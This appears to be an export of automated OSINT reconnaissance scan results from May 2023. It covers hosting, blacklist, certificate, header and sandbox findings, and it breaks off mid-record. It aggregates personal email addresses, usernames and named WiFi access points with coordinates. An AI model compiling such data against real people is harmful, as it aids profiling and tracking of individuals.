| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01-scripts.github.io]
https://www.openphish.com/feed.txt | 01-scripts.github.io |
| 2023-05-12 02:45:04 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8000::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8000::153 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | F3 (Category: social)
https://f3.cool/ayshoo | ayshoo |
| 2023-05-12 02:44:23 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-fastly-request-id: 88b13ec8ddf02c1379830d22f861ddb1826456ec | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:00:46 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.62): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.58): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 2159fc (Net ID: 00:02:2D:21:59:FC) | 34.0544, -118.244 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 172.67.135.9 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bowman's base (Net ID: 00:02:2D:21:D5:B7) | 34.0544, -118.244 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." (Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_2.jpeg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | House (Net ID: 00:02:2D:09:FC:0D) | 37.780462,-122.390564 |
| 2023-05-12 03:00:59 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-109-153.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-109-153.github.com |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 172.67.168.252 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.45): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F2:E2:35) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.246): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:25 | Internet Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | pics.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
78:10:ed:28:eb:d8:01:0b:d1:ab:19:2d:17:b5:cd:db:df:f0:
19:bb:c5:bf:e8:be:94:e0:d7:f7:4a:e4:78:eb:00:83:c4:77:
d7:fc:46:d2:7a:d8:2d:ae:b3:9c:1f:b1:2a:97:00:27:56:0d:
be:3b:56:d6:ea:2e:ac:0f:22:29:52:8c:2f:4e:a7:73:9a:8b:
01:f5:2d:ee:f8:6e:63:a3:e0:20:d2:6f:0f:23:ec:f3:e9:f5:
3a:da:07:33:d8:60:c2:43:1f:8b:32:3f:73:0c:e2:d3:be:13:
67:7a:78:16:d5:05:c8:0e:fc:fe:a1:13:73:df:ce:e4:30:4f:
fc:8a:88:a9:4b:94:16:66:3b:1f:a0:96:6e:fd:1e:fa:4a:d4:
c5:37:c1:78:37:3a:c2:f7:2a:52:e1:64:81:83:df:6c:ec:18:
9f:e8:7f:40:ba:dd:8d:ff:ab:1d:65:a2:95:0c:4b:2a:b3:d4:
36:dd:e6:94:5d:2a:ad:ec:e1:d1:0d:fe:4d:1f:eb:87:d5:03:
b5:2f:bd:c9:98:e1:60:20:bf:6e:0c:7a:85:90:e0:96:42:6a:
86:09:c1:bb:ce:bb:d7:7b:a4:b3:1a:c0:15:1c:0d:88:6b:61:
74:d0:93:ed:30:c2:a8:1b:7a:94:f2:58:8e:6d:bd:c5:15:f9:
a0:e1:79:05
|
| 2023-05-12 02:55:01 | Netblock Membership | No | Censys | 347 | 0 | 2 | 0 | None | 188.114.96.0/24 | 188.114.96.1 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Periscope (Category: video)
https://www.periscope.tv/ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | CLKDevices (Net ID: 00:01:B2:39:20:00) | 37.7642, -122.3993 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | dinamo (Net ID: 00:02:CF:8C:8A:82) | 40.2024, 29.0398 |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | contact@ikerguerrero.dev | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://ikerguerrero.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bdc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bdc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3036"\n "IsoScope_bdc_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bdc_IE_EarlyTabStart_0xf40_Mutex"\n "IsoScope_bdc_ConnHashTable<3036>_HashTable_Mutex"\n "IsoScope_bdc_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "142.250.191.74:443"\n "172.64.132.15:443"\n "151.101.1.229:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ikerguerrero.dev"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ikerguerrero.dev"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/iguerrerog/" target="_blank"><img class="intro-logo" src="assets/img/logoLinkedin.png"></a>" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FFE.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FFD.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003220]\n "RXSS1QAB.htm" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\RXSS1QAB.htm]- [targetUID: 00000000-00003220]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25724 version 1.1"- [targetUID: N/A]\n "isokoban_1_.png" has type "PNG image data 1320 x 791 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "9F12WOLK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9F12WOLK.txt]- [targetUID: 00000000-00003036]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvao7CIPrc_1_.woff" has type "Web Open Font Format TrueType length 24716 version 1.1"- [targetUID: N/A]\n "1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNDrMfJg_1_.woff" has type "Web Open Font Format TrueType length 25428 version 1.1"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25916 version 1.1"- [targetUID: N/A]\n "~DFE3DB26A7977220AD.TMP" has type "data"- Location: [%TEMP%\\~DFE3DB26A7977220AD.TMP]- [targetUID: 00000000-00003036]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25360 version 1.1"- [targetUID: N/A]\n "1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLDrMfJg_1_.woff" has type "Web Open Font Format TrueType length 25996 version 1.1"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF5B01A6D2E18F9376.TMP" has type "data"- Location: [%TEMP%\\~DF5B01A6D2E18F9376.TMP]- [targetUID: 00000000-00003036]\n "P04A7CBK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P04A7CBK.txt]- [targetUID: 00000000-00003036]\n "cubam_1_.png" has type "PNG image data 1920 x 1080 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "styles_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "GBYF66MA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GBYF66MA.txt]- [targetUID: 00000000-00003220]\n "bandera_mexico_1_.png" has type "PNG image data 2203 x 1240 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "_1D3EFA78-C97D-11ED-A555-08002718A46F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/StartBootstrap/startbootstrap-business-casual/blob/master/LICENSE"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "https://startbootstrap.com/theme/business-casual"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://use.fontawesome.com/releases/v6.1.0/js/all.js"\n Pattern match: "https://www.linkedin.com/in/iguerrerog/"\n Pattern match: "https://play.google.com/store/apps/details?id=com.StickyGames.PLCEmulatorProject"\n Pattern match: "https://fonts.googleapis.com/css?family=Lora:400,400i,700,700i"\n Pattern match: "https://fonts.googleapis.com/css?family=Raleway:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i"\n Pattern match: 